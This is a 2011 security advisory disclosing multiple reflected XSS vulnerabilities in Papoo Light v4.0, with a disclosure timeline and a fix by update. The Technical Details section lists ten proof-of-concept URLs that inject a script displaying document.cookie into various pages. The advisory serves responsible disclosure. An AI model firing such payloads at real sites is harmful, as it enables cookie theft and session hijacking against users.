SSCHADV2011-014 - Multiple XSS vulnerabilities in Papoo Light Version
Advisory: | Multiple XSS vulnerabilities in Papoo Light Version |
Advisory ID: | SSCHADV2011-014 |
Author: |
Stefan Schurtz
|
Affected Software: | v4.0 |
Vendor URL: | |
Vendor Status: | fixed |
OSVDB-ID: | - |
======================
Vulnerability Description:
======================
Vulnerability Description:
======================
The Papoo Light Version is prone to multiple XSS vulnerabilities
==============
Technical Details:
==============
Technical Details:
==============
http://<target>/papoo/papoo_light/index.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/kontakt.php/"></a><script>alert(document.cookie);</script> http://<target>/papoo/papoo_light/inhalt.php/"></a><script>alert(document.cookie);</script> http://<target>/papoo/papoo_light/forum.php/"></a><script>alert(document.cookie);</script> http://<target>/papoo/papoo_light/guestbook.php/"></a><script>alert(document.cookie);</script> http://<target>/papoo/papoo_light/account.php/"></a><script>alert(document.cookie);</script> http://<target>/papoo/papoo_light/login.php/"></a><script>alert(document.cookie);</script> http://<target>/papoo/papoo_light/index/"></a><script>alert(document.cookie);</script> http://<target>/papoo/papoo_light/forumthread.php/"></a><script>alert(document.cookie);</script> http://<target>/papoo/papoo_light/forum/"></a><script>alert(document.cookie);</script> |
=====
Solution:
=====
Solution:
=====
Update to the latest version
================
Disclosure Timeline:
================
Disclosure Timeline:
================
12-Sep-2011 – informed the developers
12-Sep-2011 – release date of this security advisory
12-Sep-2011 – response and fix by vendor
12-Sep-2011 – post on BugTraq
12-Sep-2011 – release date of this security advisory
12-Sep-2011 – response and fix by vendor
12-Sep-2011 – post on BugTraq
====
Credits:
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
References:
=======
Comments
Display comments as Linear | Threaded